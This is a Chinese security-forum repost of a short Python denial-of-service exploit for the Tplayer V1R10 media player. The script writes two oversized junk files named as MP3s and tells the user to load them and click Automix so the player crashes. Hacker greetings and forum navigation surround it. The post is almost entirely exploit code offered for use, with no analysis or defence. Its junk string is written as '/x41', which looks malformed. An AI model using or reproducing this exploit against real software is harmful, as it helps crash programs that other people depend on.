首页
社区
课程
招聘
[推荐][转帖]Tplayer V1R10 Denial of Service Vulnerability
发表于: 2010-8-25 11:14 3713

[推荐][转帖]Tplayer V1R10 Denial of Service Vulnerability

2010-8-25 11:14
3713
#!/usr/bin/python
print "--------------------Exploit ------------------------------\n"
print "----------------Tplayer V1R10 DoS Exploit------------------------------\n"
print "Greets:B0nd, Ne0, Godwin_Austin, Fb1H2s, Eberly, Punter, The_Empty(), DZZ, Micr0 \n \n"
print "-------------------------Indian Hackers Rock-----------------------------------"

junk = "/x41" * 50000;
filename = "crash.mp3";
file = open(filename,"w")
file.writelines(junk)
file.close()
filename2="crash2.mp3";
file=open(filename2,"w")
file.writelines(junk)
file.close()
print "Two Files Created "
print "[+]Usage: Load both of Created Files in player and click on Automix Button :)"
raw_input()

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//